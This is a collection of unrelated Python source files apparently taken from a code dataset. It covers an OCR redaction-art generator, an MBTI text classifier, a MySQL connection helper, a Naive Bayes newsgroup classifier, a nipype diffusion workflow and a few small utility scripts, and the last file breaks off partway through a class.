    """Run OCR over *imagefile* and return per-word bounding boxes.

    Args:
        imagefile: path of the image to OCR.
        tool: a pyocr OCR tool (e.g. the tesseract wrapper).

    Returns:
        list of pyocr WordBox objects (word content plus pixel positions).
    """
    # Removed: unused local ``num_words`` left over from an earlier version.
    return tool.image_to_string(
        Image.open(imagefile), lang="eng",
        builder=pyocr.builders.WordBoxBuilder()
    )
def image_filter(img):
    """Heavily smooth *img* by applying SMOOTH_MORE ten times in a row."""
    for _ in range(10):
        img = img.filter(ImageFilter.SMOOTH_MORE)
    return img
def parse_words(boxes):
    """Turn OCR word boxes into dicts annotated with spaCy POS tags.

    Each result dict has 'text' (punctuation-stripped word) and 'box';
    'token' and 'pos' are added when a spaCy token's text matches the
    stripped word.  Words with no matching token keep no 'pos' key.
    """
    words = []
    for box in boxes:
        word = box.content.strip()
        # Drop all punctuation characters from the OCR'd word.
        word = word.translate(str.maketrans({a: None for a in string.punctuation}))
        words.append({'text': word, 'box': box})
    # Re-assemble the original words into a sentence for the tagger.
    sent = ' '.join([w['box'].content for w in words])
    doc = nlp(sent)
    for token in doc:
        for word in words:
            text = word['text']
            # NOTE(review): duplicate words all receive the same (last
            # matching) token -- confirm this is acceptable.
            if token.text == text:
                word['token'] = token
                word['pos'] = token.pos_
    return words
def find_boxes_for_grammar(boxes):
    """Pick a random POS-pattern and greedily select matching word boxes.

    Scans the page's words in order, keeping a word when it matches the next
    POS in the chosen grammar, agrees with the previously picked word
    (article/number agreement), and passes a 1-in-31 random gate.  Raises
    IndexError when the page runs out of words (the caller retries).
    """
    words = parse_words(boxes)
    grammars = [
        ['DET', 'NOUN', 'VERB', 'NOUN'],
        ['ADJ', 'NOUN', 'VERB', 'NOUN'],
        ['ADJ', 'NOUN', 'VERB', 'ADV'],
        ['DET', 'NOUN', 'VERB', 'NOUN', 'CONJ', 'NOUN'],
        ['VERB', 'DET', 'NOUN'],
        ['ADV', 'VERB', 'NOUN', 'CONJ', 'NOUN']
    ]
    grammar = random.choice(grammars)
    picks = []
    word_index = 0
    prev_word = None
    prev_pos = None
    for pos in grammar:
        while True:
            word = words[word_index]
            if len(picks) > 0:
                prev_word = picks[-1]
                prev_pos = prev_word['pos']
            pick_this = True
            if prev_pos == 'DET':
                if prev_word['text'] == 'a' or prev_word['text'] == 'an':
                    # Pick this if it's singular
                    pick_this = not is_plural(word)
                if prev_word['text'] == 'a':
                    # Pick this if it doesn't start with a vowel
                    pick_this = not starts_with_vowel(word) and pick_this
                if prev_word['text'] == 'an':
                    pick_this = starts_with_vowel(word) and pick_this
                if prev_word['text'] == 'this':
                    pick_this = not is_plural(word) and pick_this
                if prev_word['text'] == 'these':
                    pick_this = is_plural(word) and pick_this
            if prev_pos == 'NOUN':
                # If the previous noun was plural, the verb must be plural
                if is_plural(prev_word):
                    pick_this = is_plural_verb(word) and pick_this
                if not is_plural(prev_word):
                    pick_this = not is_plural_verb(word) and pick_this
            if prev_pos == 'VERB':
                # If the verb was plural, the noun must be
                if is_plural_verb(prev_word):
                    pick_this = is_plural(word) and pick_this
                if not is_plural_verb(prev_word):
                    pick_this = not is_plural(word) and pick_this
            if pos == 'VERB':
                # Don't pick auxilliary verbs as they won't have a helper
                if 'token' in word:
                    pick_this = word['token'].dep_ != 'aux' and pick_this
            if 'pos' in word and word['pos'] == pos and pick_this and random.randint(0, 30) == 0:
                picks.append(word)
                prev_pos = pos
                word_index += 1
                break
            word_index += 1
    return [p['box'] for p in picks]
def is_plural(word):
    """Crude plural test: irregular 'men'/'women', else a trailing 's'.

    Args:
        word: dict with a 'text' key holding the lower-cased word.
    """
    text = word['text']
    if text in ('men', 'women'):
        # Special case these irregular plurals since they come up a lot.
        return True
    # BUG FIX: endswith() is safe for the empty string; the original
    # indexed text[-1] and raised IndexError on ''.
    return text.endswith('s')
def is_plural_verb(word):
    """Crude plural-verb test: 'have' is plural, else no trailing 's'.

    Args:
        word: dict with a 'text' key holding the lower-cased word.
    """
    text = word['text']
    if text == 'have':
        return True
    # BUG FIX: endswith() avoids the IndexError the original's text[-1]
    # raised on the empty string.
    return not text.endswith('s')
def is_present(word):
    """Crude present-tense test: the word ends in 's'.

    BUG FIX: endswith() is safe for the empty string, unlike the
    original's word['text'][-1] indexing.
    """
    return word['text'].endswith('s')
def starts_with_vowel(word):
    """Return True when the word's first letter is one of a, e, i, o, u.

    BUG FIX: slicing with [:1] keeps this safe for the empty string,
    where the original's [0] indexing raised IndexError.
    """
    vowels = frozenset('aeiou')
    return word['text'][:1] in vowels
def setup(imagefile):
    """Pick the first available pyocr tool and OCR *imagefile* into word
    boxes."""
    ocr_tool = pyocr.get_available_tools()[0]
    return get_boxes(imagefile, ocr_tool)
def draw(imagefile, boxes):
    """Produce one "redaction art" image: ink over the whole page except a
    randomly chosen grammatical phrase, box the surviving words, and save
    the result under build/ with a random 5-character name.
    """
    # Retry phrase selection until one fits on the page (the grammar search
    # raises IndexError when it runs out of words).
    while True:
        try:
            select_boxes = find_boxes_for_grammar(boxes)
            break
        except IndexError:
            pass
    # Get the line height by taking the average of all the box heights
    box_heights = []
    margin_lefts = []
    margin_rights = []
    margin_top = boxes[0].position[0][1]
    margin_bottom = boxes[-1].position[1][1]
    for box in boxes:
        margin_lefts.append(box.position[0][0])
        margin_rights.append(box.position[1][0])
        box_heights.append(box.position[1][1] - box.position[0][1])
    margin_left = min(margin_lefts)
    margin_right = max(margin_rights)
    line_width = mean(box_heights)
    line_spaces = [0]  # NOTE(review): unused
    last_y_pos = boxes[0].position[1][1]  # NOTE(review): unused
    src = Image.open(imagefile)
    src = src.convert('RGBA')
    # Draw the ink strokes on a transparent overlay, then composite.
    img = Image.new('RGBA', (src.size[0], src.size[1]))
    draw = ImageDraw.Draw(img)
    doc_bounding_box = (margin_left, margin_top, margin_right, margin_bottom)
    line_choices = random.choice(('v', 'h', 'a'))
    # NOTE(review): the random choice above is immediately overridden.
    line_choices = 'v'
    if line_choices == 'v':
        draw_vertical_lines(draw, select_boxes, doc_bounding_box=doc_bounding_box, line_width=line_width)
    elif line_choices == 'h':
        draw_horizontal_lines(draw, select_boxes,
                              doc_bounding_box=doc_bounding_box,
                              line_width=line_width)
    else:
        draw_vertical_lines(draw, select_boxes, doc_bounding_box=doc_bounding_box, line_width=line_width)
        draw_horizontal_lines(draw, select_boxes,
                              doc_bounding_box=doc_bounding_box,
                              line_width=line_width)
    img = image_filter(img)
    out = Image.alpha_composite(src, img)
    repeat = 10  # passes of the hand-drawn box outline
    f = 10       # jitter magnitude in pixels
    for box in select_boxes:
        pad = BOX_PADDING
        d = ImageDraw.Draw(out)
        # Corner points of the padded box: p0..p3 clockwise from top-left.
        p0 = [box.position[0][0] - pad, box.position[0][1] - pad]
        p1 = [box.position[1][0] + pad, box.position[0][1] - pad]
        p2 = [box.position[1][0] + pad, box.position[1][1] + pad]
        p3 = [box.position[0][0] - pad, box.position[1][1] + pad]
        b = (*p0, *p2)
        # Restore the unredacted pixels for the kept word.
        crop = src.crop(box=b)
        out.paste(crop, box=b)
        w = 10 + int(random.uniform(-5, 5))
        for i in range(0, repeat):
            # Jitter each corner and redraw the four edges for a sketchy look.
            fuzz = random.uniform(-f, f)
            p0 = [p + fuzz for p in p0]
            fuzz = random.uniform(-f, f)
            p1 = [p + fuzz for p in p1]
            fuzz = random.uniform(-f, f)
            p2 = [p + fuzz for p in p2]
            fuzz = random.uniform(-f, f)
            p3 = [p + fuzz for p in p3]
            fuzz = random.uniform(-f, f)
            d.line(p0 + p1, width=w, fill="black")
            d.line(p1 + p2, width=w, fill="black")
            d.line(p2 + p3, width=w, fill="black")
            d.line(p3 + p0, width=w, fill="black")
    # Flatten onto a white background and save.
    final = Image.new('RGBA', (src.size[0], src.size[1]))
    canvas = ImageDraw.Draw(final)
    canvas.rectangle([0, 0, final.size[0], final.size[1]], fill='white')
    final = Image.alpha_composite(final, out)
    outfile = str(uuid.uuid4())[0:5] + '.png'  # os.path.basename(imagefile)
    final.save("build/" + outfile)
if __name__ == '__main__':
    # Directory of page images is the single CLI argument; pages are chosen
    # at random forever, with 100 generated variants per OCR pass.
    path = sys.argv[1]
    pages = []
    for f in os.listdir(path):
        pages.append(f)
    num_generations_per_page = 100
    while True:
        f = random.choice(pages)
        imagefile = os.path.join(path, f)
        print("Procesing " + imagefile)
        # OCR once per page pick; reuse the boxes for every variant.
        boxes = setup(imagefile)
        for i in range(0, num_generations_per_page):
            draw(imagefile, boxes)
| StarcoderdataPython |
3260238 | <reponame>repasics/js-test-generators
#!/usr/bin/env python
from os import path
# Directory layout, resolved relative to this script's own location.
SCRIPTS_DIR = path.dirname(path.abspath(__file__))
TEMPLATE_DIR = path.normpath(path.join(SCRIPTS_DIR, 'templates'))
PROJECT_DIR = path.normpath(path.join(SCRIPTS_DIR, '..', '..'))
NUMBER_DIR = path.normpath(path.join(PROJECT_DIR, 'src', 'number'))
class file_write_settings():
    """Bundle of options controlling how generated test files are written."""

    def __init__(self, generated_filename, output_dir, file_header, test_cases_in_a_file):
        self.generated_filename = generated_filename  # The template of the generated filename
        self.output_dir = output_dir  # The output directory
        self.file_header = file_header  # The header of the test files
        self.test_cases_in_a_file = test_cases_in_a_file  # The number of test cases for each file
3344234 | <gh_stars>0
"""
use the trained model to predict personality
"""
import pickle as pkl
import re
import numpy as np
from nltk import WordNetLemmatizer
from nltk.corpus import stopwords
from numpy import ndarray
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.svm import SVC
# init important variables
from xgboost import XGBClassifier
personality_types = ['IE', 'NS', 'FT', 'JP']  # the four binary MBTI axes
models = []  # one fitted classifier per axis, loaded below
useless_words = stopwords.words("english")  # NLTK English stop words
unique_type_list = ['INFJ', 'ENTP', 'INTP', 'INTJ', 'ENTJ', 'ENFJ', 'INFP', 'ENFP',
                    'ISFP', 'ISTP', 'ISFJ', 'ISTJ', 'ESTP', 'ESFP', 'ESTJ', 'ESFJ']
unique_type_list = [x.lower() for x in unique_type_list]

# Load the artefacts pickled at training time.
cntizer: CountVectorizer       # fitted bag-of-words vectorizer
tfizer: TfidfTransformer       # fitted tf-idf transform
lemmatizer: WordNetLemmatizer  # NLTK lemmatizer pickled with the models
with open('model/cntizer.pkl', 'rb') as f:
    cntizer = pkl.load(f)
with open('model/tfizer.pkl', 'rb') as f:
    tfizer = pkl.load(f)
with open('model/lemmatizer.pkl', 'rb') as f:
    lemmatizer = pkl.load(f)
for name in personality_types:
    with open(f'model/{name}.pkl', 'rb') as f:
        models.append(pkl.load(f))
# pre processing methods
# Splitting the MBTI personality into 4 letters and binarizing it
# Binary encoding of the MBTI letters: per axis, the first letter maps to 0
# and the second to 1.
b_Pers = {'I': 0, 'E': 1, 'N': 0, 'S': 1, 'F': 0, 'T': 1, 'J': 0, 'P': 1}
b_Pers_list = [{0: 'I', 1: 'E'}, {0: 'N', 1: 'S'}, {0: 'F', 1: 'T'}, {0: 'J', 1: 'P'}]


def translate_personality(personality):
    """Encode an MBTI string such as 'INTJ' as a 4-element 0/1 vector."""
    return [b_Pers[letter] for letter in personality]


def translate_back(personality):
    """Decode a 4-element 0/1 vector back into its MBTI string."""
    return ''.join(b_Pers_list[axis][bit]
                   for axis, bit in enumerate(personality))
def pre_process_text(data: list, remove_stop_words=True, remove_mbti_profiles=True) -> ndarray:
    """Normalise raw posts into cleaned, lemmatised strings.

    Args:
        data: list of raw post strings.
        remove_stop_words: drop NLTK stop words when True.
        remove_mbti_profiles: strip the 16 lower-cased MBTI type strings so
            they cannot leak the label into the features.

    Returns:
        numpy array of cleaned post strings, one per input post.
    """
    list_posts = []
    for posts in data:
        # Remove url links
        temp = re.sub('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', ' ', posts)
        # Remove Non-words - keep only words
        temp = re.sub("[^a-zA-Z]", " ", temp)
        # Remove spaces > 1
        temp = re.sub(' +', ' ', temp).lower()
        # Remove multiple letter repeating words
        temp = re.sub(r'([a-z])\1{2,}[\s|\w]*', '', temp)
        # Remove stop words
        if remove_stop_words:
            temp = " ".join([lemmatizer.lemmatize(w) for w in temp.split(' ') if w not in useless_words])
        else:
            temp = " ".join([lemmatizer.lemmatize(w) for w in temp.split(' ')])
        # Remove MBTI personality words from posts
        if remove_mbti_profiles:
            for t in unique_type_list:
                temp = temp.replace(t, '')
        # the cleaned data temp is collected here
        list_posts.append(temp)
    return np.array(list_posts)
def predict(my_posts: list) -> str:
    """Predict the MBTI type string for a list of raw post strings."""
    cleaned = pre_process_text(my_posts, remove_stop_words=True,
                               remove_mbti_profiles=True)
    features = tfizer.transform(cntizer.transform(cleaned)).toarray()
    # One binary model per personality axis; the rounded mean prediction
    # across posts acts as a majority vote for that axis.
    axis_bits = [round(model.predict(features).mean(), 0) for model in models]
    return translate_back(axis_bits)
if __name__ == '__main__':
    # Simple REPL: read '|||'-separated posts, print the predicted type.
    while True:
        print('>> ' + predict(input('<< ').split('|||')))
| StarcoderdataPython |
4822470 | #!/usr/bin/env python3
from lark import Lark
program = open('program.txt').read()  # input text to parse
rule = open('sip.lark').read()        # grammar definition
# Hand the grammar rules to the parser generator to build a parser
# (it handles the lexing as well).
parser = Lark(rule, start='generic_message', parser='lalr')
# Lex and parse the program.
tree = parser.parse(program)
print(tree.pretty())
| StarcoderdataPython |
100690 | import logging
from getpass import getpass
import keyring
from mysql import connector
from mysql.connector.errors import ProgrammingError
log = logging.getLogger(__name__)  # module-level logger
class CursorProvider:
    """Process-wide provider of MySQL cursors over one shared connection.

    Call :meth:`init` once with connection settings, then :meth:`get` for
    a fresh cursor on the shared connection.
    """

    instance = None  # singleton __CursorProvider, created by init()

    @classmethod
    def get(cls):
        """Return a new cursor from the shared connection.

        Raises:
            AttributeError: if init() has not been called yet.
        """
        if CursorProvider.instance is None:
            raise AttributeError('Trying to get instance before instantiating, call {} from {}.{} beforehand'
                                 .format(CursorProvider.init.__name__, __name__, cls.__name__))
        return CursorProvider.instance.connection.cursor()

    @staticmethod
    def init(host, user, port=None, database=None, ask_password=False, store_password=False):
        """Create the singleton connection holder.

        Args:
            host, user, port, database: MySQL connection settings; port
                defaults to 3306.
            ask_password: prompt for the password instead of the keyring.
            store_password: save a successfully used password in the keyring.
        """
        CursorProvider.instance = CursorProvider.__CursorProvider(host, user, port, database, ask_password,
                                                                  store_password)

    class __CursorProvider:
        """Private holder owning the actual MySQL connection."""

        def __init__(self, host, user, port=None, database=None, ask_password=False, store_password=False):
            port = port if port is not None else 3306
            log.debug('Trying to connect to the database %s@%s:%s/%s', user, host, port, database)
            # Keyring service name is scoped per target host.
            service = 'mysql-tracer/{host}'.format(host=host)
            if ask_password:
                self.connect_with_retry(host, port, user, database, service, store_password)
            else:
                log.debug('Retrieving password from keyring (%s@%s)', user, service)
                keyring_password = keyring.get_password(service, user)
                if keyring_password is not None:
                    self.connection = connector.connect(host=host, port=port, user=user, db=database,
                                                        password=keyring_password)
                else:
                    log.info('Did not find password in keyring, asking for password...')
                    self.connect_with_retry(host, port, user, database, service, store_password)
            log.info('Connected to database with success')

        def connect_with_retry(self, host, port, user, database, service, store_password, retry=2):
            """Prompt for a password and connect.

            On MySQL error 1045 (access denied), re-prompt up to ``retry``
            more times; any other error propagates.
            """
            password = getpass('Password for {user}@{host}: '.format(user=user, host=host))
            try:
                self.connection = connector.connect(host=host, port=port, user=user, db=database, password=password)
            except ProgrammingError as error:
                if error.errno == 1045 and retry > 0:
                    log.warning('Access Denied, retrying...')
                    self.connect_with_retry(host, port, user, database, service, store_password, retry=retry - 1)
                    # BUG FIX: return here -- the original fell through and
                    # stored this frame's *failed* password in the keyring,
                    # overwriting the one saved by the successful retry.
                    return
                else:
                    raise error
            if store_password:
                log.info('Storing password into keyring (%s@%s)', user, service)
                keyring.set_password(service, user, password)

        def __del__(self):
            # Best-effort cleanup when the holder is garbage-collected.
            if hasattr(self, 'connection') and self.connection.is_connected():
                log.info('Closing connection to database')
                self.connection.close()
| StarcoderdataPython |
1648197 | <filename>kernfab/start.py
"""
Module for starting kernel VM(s)
"""
from kernfab import config, network, qemu
def start(base_image: bool = False) -> None:
    """Bring up the network, then boot either the base-image VM (id 0) or
    one VM per configured slot."""
    network.start()
    if base_image:
        # Single VM booted from the shared base image.
        qemu.run_vm(config.qemu_get_base_image(), 0)
    else:
        # One VM per slot, each with its own per-VM image.
        for vm_id in range(config.NUM_VMS):
            qemu.run_vm(config.qemu_get_vm_image(vm_id), vm_id)
| StarcoderdataPython |
"""Quick reference of Python boolean keywords and comparison operators:
``and``, ``or``, ``not``, ``!=``, ``==``, ``>=``, ``<=``, ``True``, ``False``.
(C-style ``&&`` and ``||`` are not valid Python; use ``and`` / ``or``.)
"""

result = (5 == 5)
print("\n", result)
1785041 | <reponame>Likitha-Seeram/Naive-Bayes-Text-Classification
import os, glob
path = '20_newsgroups'  # path of the dataset root
folders = os.listdir(path)  # one folder per newsgroup class
# Score a document against one class's bag of words.
def CheckProbability(testWords, bag, number):
    """Return the class score for a document.

    Args:
        testWords: tokens of the document being classified.
        bag: the class's word-count dictionary.
        number: index of the class in ``folders`` (selects ``sizes[number]``).

    Returns:
        Sum of the Laplace-smoothed per-word probabilities, counting only
        words that appear somewhere in the training vocabulary.
    """
    size = sizes[number]  # total word count of this class's dictionary
    p = 0
    for t in testWords:
        # BUG FIX: use the ``bag`` argument.  The original read the module
        # global ``bag_of_words[f]``, silently depending on the leaked loop
        # variable ``f`` and ignoring the dictionary it was handed.
        weightage = bag.get(t, 0)      # count of the word in this class
        check = total_words.get(t, 0)  # count of the word in the vocabulary
        # Laplace ("add one") smoothing over class size + vocabulary size.
        probability = ((weightage + 1) / (size + total))
        if check != 0:  # only score words seen during training
            p = p + probability
    return p
# Data cleaning: lower-case, strip digits/symbols, drop stop words.
def clean(fileData):
    """Normalise one raw newsgroup document into a list of tokens.

    Steps: flatten newlines, lower-case, drop digits, delete/space-replace
    punctuation, split, and filter out stop words.

    Args:
        fileData: the raw document text.

    Returns:
        list of cleaned lower-case word tokens.
    """
    fileData = fileData.replace('\n', ' ')  # flatten newlines
    fileData = fileData.lower()             # lower-case everything
    fileData = fileData.translate({ord(z): None for z in '0123456789'})  # drop digits
    removeList = ['<','>','?','.','"',')','(','|','-','_','#','*','+','"','$']
    replaceList = ["'",'!','/','=',',',':','\\']
    # frozenset gives O(1) membership tests instead of scanning a list.
    # BUG FIX: the original list contained the implicit string concatenation
    # ``'needn' 'no'`` which produced the bogus token 'neednno' and silently
    # dropped 'no' from the stop list; both words are now listed properly.
    stopWords = frozenset([
        'a', 'about', 'above', 'after', 'again', 'against', 'aint', 'all', 'am', 'an', 'and', 'any', 'are', 'arent',
        'aren', 'isn', 'as', 'at', 'be', 'because', 'been', 'before', 'being', 'below', 'between', 'both', 'but', 'by',
        'can', 'couldn', 'couldnt', 'could', 'd', 'did', 'didnt', 'didn', 'do', 'does', 'doesnt', 'doesn', 'doing',
        'dont', 'down', 'during', 'each', 'few', 'for', 'from', 'further', 'had', 'hadnt', 'has', 'hasnt', 'have', 'shan',
        'havent', 'having', 'he', 'her', 'here', 'hers', 'herself', 'him', 'himself', 'his', 'how', 'i', 'if', 'in',
        'into', 'is', 'isnt', 'it', 'its', 'don', 'itself', 'just', 'll', 'm', 'ma', 'me', 'mightnt', 'more', 'most',
        'mustnt', 'my', 'myself', 'neednt', 'needn', 'no', 'nor', 'not', 'now', 'o', 'of', 'off', 'on', 'once', 'only',
        'or', 'other', 'our', 'ours', 'b', 'r', 'w', 'ourselves', 'out', 'over', 'own', 're', 's', 'same', 'shant',
        'she', 'should', 'shouldnt', 'so', 'shan', 'hadn', 'hasn', 'haven', 'wouldn', 'also', 'mightn', 'ain', 'wasn',
        'some', 'such', 't', 'than', 'that', 'the', 'their', 'theirs', 'them', 'themselves', 'then', 'there', 'weren',
        'these', 'they', 'this', 'those', 'through', 'to', 'too', 'under', 'until', 'up', 've', 'very', 'was',
        'wasnt', 'we', 'were', 'werent', 'what', 'when', 'where', 'which', 'while', 'who', 'x', 'c', 'whom', 'why',
        'will', 'with', 'won', 'wont', 'wouldnt', 'y', 'you', 'your', 'yours', 'yourself', 'yourselves', 'would', 'gmt',
        'xref', 'us', 'one', 'two', 'like', 'know', 'lines', 'messageid', 'mustn', 'shouldn'])
    for x in removeList:
        fileData = fileData.replace(x, '')
    for x in replaceList:
        fileData = fileData.replace(x, ' ')
    fileData = [word for word in fileData.split() if word not in stopWords]
    return fileData
# Dictionaries for the training and testing sets.
bag_of_words = {}   # class name -> {word: count} for that class
total_words = {}    # word -> count across the whole training corpus
testing_files = {}  # class name -> list of held-out file paths
print ("Building bag of words ...")
# Train on the first 500 files of each folder; the remaining files in each
# folder form the test set.
for f1 in folders:
    temp = {}
    files = glob.glob(os.path.join(path, f1, '*'))
    for f2 in files[:500]:
        with open(f2) as f:
            data = clean(f.read())
            # For each word, increment its count in the class dictionary and
            # in the global vocabulary, inserting it on first sight.
            for w in data:
                count_in_bag = temp.get(w, 0)
                count_in_total = total_words.get(w, 0)
                if count_in_bag == 0:
                    temp[w] = 1
                else:
                    temp[w] = count_in_bag + 1
                if count_in_total == 0:
                    total_words[w] = 1
                else:
                    total_words[w] = count_in_total + 1
    bag_of_words[f1] = temp
    testing_files[f1] = files[500:]
total = len(total_words)  # vocabulary size, used for Laplace smoothing
print (total, 'is the Length of Training set')
sizes = []  # total word count per class dictionary, indexed like folders
for f in folders:
    sizes.append(sum(bag_of_words[f].values()))
print ("Testing ...")
success = 0  # number of correctly classified test files
count = 0    # total number of test files
# Classify every held-out file: score it against each class and pick the
# class with the highest score.
for folder in folders:
    for testFile in testing_files[folder]:
        count = count + 1
        with open(testFile) as file:
            data = clean(file.read())
        prob = []
        for f in folders:
            prob.append(CheckProbability(data, bag_of_words[f], list(bag_of_words.keys()).index(f)))
        # Count a success when the best-scoring class is the true folder.
        if folders[prob.index(max(prob))] == folder:
            success = success + 1
Accuracy = success / count  # fraction of test files classified correctly
print ("Accuracy of the classification is", Accuracy*100)
3354418 | from traits.api import HasTraits, Directory, Bool
import traits.api as traits
from ....base import MetaWorkflow, load_config, register_workflow
from wip_diffusion import config as pconfig
"""
Part 1: MetaWorkflow
"""
mwf = MetaWorkflow()
mwf.help = """
Diffusion tracking workflow
===========================
"""
mwf.uuid = 'fda82554a43511e1b507001e4fb1404c'
mwf.tags = ['diffusion','dti','tracking']
mwf.script_dir = 'fmri'
"""
Part 2: Config
"""
class config(HasTraits):
    """Declarative configuration for the diffusion tracking workflow.

    Instances are edited through the traitsui view built by ``create_view``
    and loaded from JSON by ``load_config`` in ``main``.
    """
    uuid = traits.Str(desc="UUID")
    desc = traits.Str(desc='Workflow description')
    # Directories
    working_dir = Directory(mandatory=True, desc="Location of the Nipype working directory")
    sink_dir = Directory(mandatory=True, desc="Location where the BIP will store the results")
    crash_dir = Directory(mandatory=False, desc="Location to store crash files")
    # Execution
    run_using_plugin = Bool(False, usedefault=True, desc="True to run pipeline with plugin, False to run serially")
    plugin = traits.Enum("PBS", "PBSGraph","MultiProc", "SGE", "Condor",
        usedefault=True,
        desc="plugin to use, if run_using_plugin=True")
    plugin_args = traits.Dict({"qsub_args": "-q many"},
        usedefault=True, desc='Plugin arguments.')
    test_mode = Bool(False, mandatory=False, usedefault=True,
        desc='Affects whether where and if the workflow keeps its \
intermediary files. True to keep intermediary files. ')
    # Subjects
    subjects= traits.List(traits.Str, mandatory=True, usedefault=True,
        desc="Subject id's. Note: These MUST match the subject id's in the \
Freesurfer directory. For simplicity, the subject id's should \
also match with the location of individual functional files.")
    # Preprocessing info
    preproc_config = traits.File(desc="preproc json file")
    #Advanced
    use_advanced_options = traits.Bool()
    advanced_script = traits.Code()
    save_script_only = traits.Bool(False)
def create_config():
    """Return a fresh ``config`` pre-populated with this workflow's metadata."""
    cfg = config()
    cfg.uuid = mwf.uuid
    cfg.desc = mwf.help
    return cfg


# Register the factory so the BIPS UI can build a default configuration.
mwf.config_ui = create_config
"""
Part 3: View
"""
def create_view():
    """Assemble the traitsui View used to edit a ``config`` instance."""
    from traitsui.api import View, Item, Group, CSVListEditor
    from traitsui.menu import OKButton, CancelButton

    # Build each bordered section separately, then compose the final View.
    description = Group(Item(name='uuid', style='readonly'),
                        Item(name='desc', style='readonly'),
                        label='Description', show_border=True)
    directories = Group(Item(name='working_dir'),
                        Item(name='sink_dir'),
                        Item(name='crash_dir'),
                        label='Directories', show_border=True)
    execution = Group(Item(name='run_using_plugin'),
                      Item(name='plugin', enabled_when="run_using_plugin"),
                      Item(name='plugin_args', enabled_when="run_using_plugin"),
                      Item(name='test_mode'),
                      label='Execution Options', show_border=True)
    subjects = Group(Item(name='subjects', editor=CSVListEditor()),
                     label='Subjects', show_border=True)
    track = Group(Item(name='preproc_config'),
                  label='Track', show_border=True)
    advanced = Group(Item("use_advanced_options"),
                     Item("advanced_script"),
                     label="Advanced", show_border=True)
    return View(description, directories, execution, subjects, track, advanced,
                buttons=[OKButton, CancelButton],
                resizable=True,
                width=1050)


mwf.config_view = create_view
"""
Part 4: Construct Workflow
"""
from ..scripts.diffusion_base import create_workflow
def get_dataflow(c):
    """Create the DataGrabber node that locates preprocessed diffusion files.

    All templates are resolved under ``c.sink_dir`` using the subject id.
    """
    import nipype.pipeline.engine as pe
    import nipype.interfaces.io as nio

    out_fields = ['dwi', 'mask', 'bvecs', 'bvals', "reg", "mean"]
    grabber = pe.Node(interface=nio.DataGrabber(infields=['subject_id'],
                                                outfields=out_fields),
                      name='datasource')
    grabber.inputs.base_directory = c.sink_dir
    grabber.inputs.template = '*'
    grabber.inputs.field_template = {
        'dwi': '%s/preproc/outputs/dwi/*',
        'mask': '%s/preproc/outputs/mask/*',
        'bvecs': '%s/preproc/outputs/bvecs/*',
        'bvals': '%s/preproc/outputs/bvals/*',
        'reg': '%s/preproc/outputs/bbreg/*.dat',
        'mean': '%s/preproc/outputs/mean/*.nii*',
    }
    # Every template takes the subject id as its single substitution.
    grabber.inputs.template_args = {field: [['subject_id']]
                                    for field in out_fields}
    return grabber
foo = pconfig()  # module-level default preprocessing config (default arg below)
def get_wf(c, prep_c=foo):
    """Wire the diffusion tracking workflow for the given configuration.

    Connects the preprocessed-data grabber to the tracking workflow's
    inputspec, fans the outputs out to a DataSink under
    ``<sink_dir>/<subject_id>/track/``, and iterates over subjects
    (only the first subject in test mode).

    NOTE(review): ``prep_c`` defaults to a freshly constructed ``pconfig``;
    ``main`` always passes the loaded preproc config explicitly.
    """
    import nipype.pipeline.engine as pe
    import nipype.interfaces.io as nio
    import nipype.interfaces.utility as niu
    workflow = create_workflow()
    datagrabber = get_dataflow(prep_c)
    # Feed the grabbed preprocessing outputs into the tracking workflow.
    inputspec = workflow.get_node('inputspec')
    workflow.connect(datagrabber,'mask',inputspec,'mask')
    workflow.connect(datagrabber,'dwi',inputspec,'dwi')
    workflow.connect(datagrabber,'bvecs',inputspec,'bvecs')
    workflow.connect(datagrabber,'bvals',inputspec,'bvals')
    workflow.connect(datagrabber,'reg',inputspec,'reg')
    workflow.connect(datagrabber,'mean',inputspec,'mean')
    workflow.inputs.inputspec.surf_dir=prep_c.surf_dir
    # A single IdentityInterface node drives the per-subject iteration.
    infosource = pe.Node(niu.IdentityInterface(fields=["subject_id"]),name='subject_names')
    workflow.connect(infosource,"subject_id",datagrabber, 'subject_id')
    workflow.connect(infosource,"subject_id",inputspec, 'subject_id')
    # Sink tracking results under the subject's container directory.
    sinker = pe.Node(nio.DataSink(),name='sinker')
    outputspec=workflow.get_node('outputspec')
    workflow.connect(outputspec,'fdt_paths',sinker,'track.fdt_paths')
    workflow.connect(outputspec,'log',sinker,'track.log')
    workflow.connect(outputspec,'particle_files',sinker,'track.particle_files')
    workflow.connect(outputspec,'targets',sinker,'track.targets')
    workflow.connect(outputspec,'way_total',sinker,'track.way_total')
    sinker.inputs.base_directory=c.sink_dir
    workflow.connect(infosource,"subject_id",sinker,"container")
    if c.test_mode:
        infosource.iterables=("subject_id", [c.subjects[0]])
    else:
        infosource.iterables=("subject_id", c.subjects)
    workflow.base_dir = c.working_dir
    return workflow
mwf.workflow_function = get_wf
"""
Part 5: Main
"""
def main(config_file):
    """Load the workflow config, build the tracking workflow, and run it.

    Parameters
    ----------
    config_file : str
        Path to the JSON file describing a ``config`` instance.

    Returns
    -------
    int
        Always 1 on successful completion.
    """
    c = load_config(config_file, config)
    prep_c = load_config(c.preproc_config, pconfig)
    workflow = get_wf(c, prep_c)
    if c.use_advanced_options:
        # Bug fix: ``exec c.advanced_script`` is Python 2 statement syntax
        # (a SyntaxError on Python 3); the call form works on both versions.
        exec(c.advanced_script)
    if c.test_mode:
        workflow.write_graph()
    if c.run_using_plugin:
        workflow.run(plugin=c.plugin, plugin_args=c.plugin_args)
    else:
        workflow.run()
    return 1
mwf.workflow_main_function = main
"""
Part 6: Main
"""
# Make this MetaWorkflow discoverable by the global BIPS workflow registry.
register_workflow(mwf)
| StarcoderdataPython |
14118 | from marshmallow import fields, Schema
from .provision import ProvisionActionSchema
class InstanceSchema(Schema):
    """Schema for the ``instance`` section of an AWS compute config.

    All string fields are required except ``ebs_optimized``.
    """
    type = fields.String(required=True)
    image_id = fields.String(required=True)
    availability_zone = fields.String(required=True)
    ebs_optimized = fields.Boolean()  # optional
    iam_fleet_role = fields.String(required=True)
    class Meta:
        # Keep serialized field order identical to declaration order.
        ordered = True
class AuthSchema(Schema):
    """Schema for the ``auth`` section: key pair, identity file, user/group."""
    key_pair_name = fields.String(required=True)
    identity_file = fields.String(required=True)
    user = fields.String(required=True)
    group = fields.String(required=True)
    class Meta:
        # Keep serialized field order identical to declaration order.
        ordered = True
class NetworkSchema(Schema):
